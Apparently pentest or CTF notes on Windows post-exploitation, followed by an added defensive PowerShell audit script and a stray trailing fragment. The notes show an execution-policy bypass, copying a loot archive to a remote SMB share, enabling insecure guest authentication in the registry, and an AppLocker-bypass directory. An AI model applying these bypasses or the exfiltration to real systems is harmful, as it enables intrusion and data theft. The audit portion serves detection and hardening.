PowerShell's execution policy
PowerShell's execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts.
Load a PowerShell session with the execution policy bypassed:
C:\> powershell -ep bypass
To fix the following error, you need to set
AllowInsecureGuestAuth, located in
PS C:\Users\Administrator> copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
copy : You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
At line:1 char:1
+ copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-Item], IOException
    + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand
You can set it with PowerShell:
PS C:\Users\Administrator> Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' -Name 'AllowInsecureGuestAuth' -Value 1
When AppLocker is configured with the default AppLocker rules, we can bypass it by placing our executable in the following directory:
C:\Windows\System32\spool\drivers\color (whitelisted by default).
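To check a host for the three settings covered above, the following read-only audit is an added example, not part of the original notes. It reports scopes with a permissive execution policy, whether AllowInsecureGuestAuth is enabled, and which non-administrative SIDs can write to the AppLocker-allowed directory. The function names, the list of trusted SIDs and the inclusion of the Group Policy key for the same value are choices made for this example.

```powershell
# Added audit example: reads settings only, changes nothing.

function Get-InsecureGuestAuthState {
    # First key is the one set in the notes; second is where Group Policy writes the same value.
    $keys = @(
        'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters',
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\LanmanWorkstation'
    )
    foreach ($key in $keys) {
        $item = Get-ItemProperty -Path $key -Name 'AllowInsecureGuestAuth' -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Key     = $key
            Value   = if ($item) { $item.AllowInsecureGuestAuth } else { $null }
            Enabled = [bool]($item -and $item.AllowInsecureGuestAuth -eq 1)
        }
    }
}

function Get-NonAdminWriteAccess {
    param([string]$Path = 'C:\Windows\System32\spool\drivers\color')
    # Write bits: CreateFiles/WriteData (0x2), AppendData (0x4), GENERIC_WRITE, GENERIC_ALL.
    $writeMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000
    # Assumed trusted principals: SYSTEM, Administrators, CREATOR OWNER, service SIDs (S-1-5-80-*).
    $trusted = 'S-1-5-18', 'S-1-5-32-544', 'S-1-3-0'
    $sidType = [System.Security.Principal.SecurityIdentifier]
    (Get-Acl -Path $Path).GetAccessRules($true, $true, $sidType) |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ([int]$_.FileSystemRights -band $writeMask) -and
            $_.IdentityReference.Value -notin $trusted -and
            $_.IdentityReference.Value -notlike 'S-1-5-80-*'
        } |
        Select-Object @{ n = 'Sid'; e = { $_.IdentityReference.Value } }, FileSystemRights
}

function Get-PermissiveExecutionPolicy {
    # A "-ep bypass" launch only affects that process, so this shows persistent scopes.
    Get-ExecutionPolicy -List |
        Where-Object { "$($_.ExecutionPolicy)" -in 'Bypass', 'Unrestricted' }
}

'--- Execution policy scopes set to Bypass/Unrestricted ---'
Get-PermissiveExecutionPolicy | Format-Table -AutoSize
'--- AllowInsecureGuestAuth ---'
Get-InsecureGuestAuthState | Format-Table -AutoSize
'--- Non-admin write access to the AppLocker-allowed directory ---'
Get-NonAdminWriteAccess | Format-Table -AutoSize
```

Any row in the last table means a standard user can drop files into a path that the default AppLocker rules allow, so either tighten the ACL or add a deny/exception rule for that directory.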
- ConsoleHost_history :